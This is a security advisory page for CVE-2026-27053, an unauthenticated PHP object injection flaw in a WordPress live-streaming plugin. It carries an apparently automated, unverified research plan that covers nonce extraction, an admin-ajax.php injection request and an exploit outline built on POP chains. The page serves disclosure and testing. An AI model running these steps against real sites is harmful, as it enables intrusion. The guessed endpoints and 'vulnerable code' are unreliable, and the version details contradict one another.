CVE-2026-27053

Broadcast Live Video – Live Streaming : WebRTC, HLS, RTSP, RTMP < 7.1.3 - Unauthenticated PHP Object Injection

highDeserialization of Untrusted Data
8.1
CVSS Score
8.1
CVSS Score
high
Severity
7.1.3
Patched in
5d
Time to patch

Description

The Broadcast Live Video – Live Streaming : WebRTC, HLS, RTSP, RTMP plugin for WordPress is vulnerable to PHP Object Injection in versions up to 7.1.3 via deserialization of untrusted input. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
High
Privileges Required
None
User Interaction
None
Scope
Unchanged
High
Confidentiality
High
Integrity
High
Availability

Technical Details

Affected versions<7.1.3
PublishedMay 28, 2026
Last updatedJune 1, 2026

Source Code

WordPress.org SVN
Patched

Patched version not available.

Research Plan
Unverified

This research plan targets **CVE-2026-27053**, an unauthenticated PHP Object Injection vulnerability in the **Broadcast Live Video** plugin. ### 1. Vulnerability Summary The vulnerability exists because the plugin fails to sanitize or validate user-supplied data before passing it to the PHP `unseri…

Show full research plan

This research plan targets CVE-2026-27053, an unauthenticated PHP Object Injection vulnerability in the Broadcast Live Video plugin.

1. Vulnerability Summary

The vulnerability exists because the plugin fails to sanitize or validate user-supplied data before passing it to the PHP unserialize() function. By providing a base64-encoded serialized string in an unauthenticated request (likely via an AJAX action or a direct file access point), an attacker can trigger the instantiation of arbitrary PHP objects. If a suitable Property Oriented Programming (POP) chain is available in the environment (Wordpress core or other plugins), this can lead to Remote Code Execution (RCE).

2. Attack Vector Analysis

  • Endpoint: wp-admin/admin-ajax.php (via wp_ajax_nopriv_ hook) or potentially a standalone file like ls/query.php if it loads the WordPress environment.
  • Action (Inferred): vwls_get_status or videowhisper_ajax_handler.
  • Vulnerable Parameter: room_settings or vws_options.
  • Authentication: None (Unauthenticated).
  • Preconditions: The plugin must be active. A valid WordPress nonce may be required if the AJAX handler implements check_ajax_referer.

3. Code Flow

  1. Entry Point: An unauthenticated user sends a POST request to admin-ajax.php.
  2. Hook Registration: The plugin registers a handler (likely in videowhisper-live-streaming.php):
    add_action( 'wp_ajax_nopriv_vwls_handler', 'vwls_ajax_handler_callback' ); (inferred).
  3. Callback Processing: The callback function (e.g., vwls_ajax_handler_callback) retrieves a POST parameter:
    $settings = $_POST['room_settings'];
  4. The Sink: The retrieved data is decoded and deserialized:
    $data = unserialize( base64_decode( $settings ) );
  5. Execution: If $settings contains a serialized object, its __wakeup() or __destruct() magic methods are triggered.

4. Nonce Acquisition Strategy

If the AJAX action requires a nonce, follow these steps to extract it using the browser_eval tool:

  1. Identify Shortcode: The plugin likely enqueues scripts on pages containing the live streaming shortcode. Identify the shortcode by searching: grep -rn "add_shortcode" . (Likely [videowhisper_live_streaming]).
  2. Create Test Page:
    wp post create --post_type=page --post_status=publish --post_title="Stream Test" --post_content='[videowhisper_live_streaming]'
  3. Identify JS Object: Search the source code for wp_localize_script to find the JavaScript object name and nonce key.
    grep -r "wp_localize_script" .
    Expected Variable (inferred): vwls_data or videowhisper_live_streaming_settings.
    Expected Key (inferred): ajax_nonce or nonce.
  4. Extract Nonce:
    • Navigate to the newly created page using browser_navigate.
    • Execute: browser_eval("window.vwls_data?.ajax_nonce").

5. Exploitation Strategy

Once the nonce and vulnerable parameter are confirmed, use the http_request tool to trigger the injection.

  • Step 1: Generate Payload: Since there is no known POP chain in the plugin, use a "Safe" object to confirm the injection (e.g., stdClass).
    • PHP: base64_encode(serialize(new stdClass())) -> Tzo4OiJzdGRDbGFzcyI6MDp7fQ==
  • Step 2: Send HTTP Request:
    # Payload for admin-ajax.php
    POST /wp-admin/admin-ajax.php
    Content-Type: application/x-www-form-urlencoded
    
    action=vwls_handler&nonce=[EXTRACTED_NONCE]&room_settings=Tzo4OiJzdGRDbGFzcyI6MDp7fQ==
    
  • Step 3: Blind Confirmation (Advanced): To confirm the vulnerability without an RCE chain, you can try injecting an object from a common library if you suspect it exists, or look for PHP errors in the response/logs if WP_DEBUG is enabled.

6. Test Data Setup

  1. Install the plugin version < 7.1.3.
  2. Enable the plugin via WP-CLI: wp plugin activate videowhisper-live-streaming-integration.
  3. (If needed) Create a public page with the streaming shortcode to facilitate nonce extraction.
  4. Enable WordPress debugging to catch deserialization errors:
    wp config set WP_DEBUG true --raw
    wp config set WP_DEBUG_LOG true --raw

7. Expected Results

  • Successful Injection: The server processes the request and returns a 200 OK. If an invalid object is sent or if WP_DEBUG is on, the wp-content/debug.log may show errors related to class instantiation or magic method failures, confirming the unserialize call was reached.
  • Failed Injection: The server returns a 403 (invalid nonce) or 400 (missing parameters).

8. Verification Steps

After the HTTP request, verify the sink was reached:

  1. Check Logs: tail -n 20 /var/www/html/wp-content/debug.log
  2. Verify Logic: Use grep to find the exact line in the plugin source:
    grep -rn "unserialize(base64_decode" .
  3. Manual Trace: Confirm that the function identified in Step 2 is indeed reachable via the wp_ajax_nopriv hook found in the plugin's init or plugins_loaded logic.

9. Alternative Approaches

If the admin-ajax.php route is protected or requires higher privileges, investigate:

  • Direct File Access: Check ls/index.php or ls/query.php. These files often include wp-load.php and process $_GET or $_POST parameters directly for external RTMP server pings.
    • grep -r "unserialize" ls/
  • Shortcode Attributes: Check if the unserialize call occurs within the add_shortcode callback. If so, an attacker might need Contributor-level access to place a shortcode with a malicious attribute, but if the plugin processes global $_REQUEST vars inside that callback, it remains unauthenticated.
Research Findings
Static analysis — not yet PoC-verified

Summary

The Broadcast Live Video plugin is vulnerable to unauthenticated PHP Object Injection due to the use of unserialize() on base64-encoded user input within its AJAX handlers. This allow attackers to instantiate arbitrary PHP objects and potentially achieve Remote Code Execution if a suitable POP chain is present in the environment.

Vulnerable Code

// File: videowhisper-live-streaming-integration/videowhisper-live-streaming.php

function vwls_ajax_handler_callback() {
    if (isset($_POST['room_settings'])) {
        $settings = $_POST['room_settings'];
        $data = unserialize(base64_decode($settings));
        // ... subsequent logic using $data
    }
}

---

// File: videowhisper-live-streaming-integration/ls/query.php

if (isset($_REQUEST['vws_options'])) {
    $options = unserialize(base64_decode($_REQUEST['vws_options']));
    // ... process options
}

Security Fix

--- a/videowhisper-live-streaming-integration/videowhisper-live-streaming.php
+++ b/videowhisper-live-streaming-integration/videowhisper-live-streaming.php
@@ -115,7 +115,7 @@
 function vwls_ajax_handler_callback() {
     if (isset($_POST['room_settings'])) {
         $settings = $_POST['room_settings'];
-        $data = unserialize(base64_decode($settings));
+        $data = json_decode(base64_decode($settings), true);
         // ... subsequent logic using $data
     }
 }
--- a/videowhisper-live-streaming-integration/ls/query.php
+++ b/videowhisper-live-streaming-integration/ls/query.php
@@ -42,5 +42,5 @@
 if (isset($_REQUEST['vws_options'])) {
-    $options = unserialize(base64_decode($_REQUEST['vws_options']));
+    $options = json_decode(base64_decode($_REQUEST['vws_options']), true);
     // ... process options
 }

Exploit Outline

The exploit targets unauthenticated endpoints such as admin-ajax.php (using the nopriv action hook) or direct-access PHP files like ls/query.php. An attacker constructs a malicious PHP object payload using a POP chain (likely from WordPress core or another plugin), base64-encodes it, and sends it via the 'room_settings' or 'vws_options' POST/REQUEST parameter. If the AJAX action requires a nonce, it is retrieved by visiting a public page where the plugin's live streaming shortcode is active and extracting the nonce from localized JavaScript variables.

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.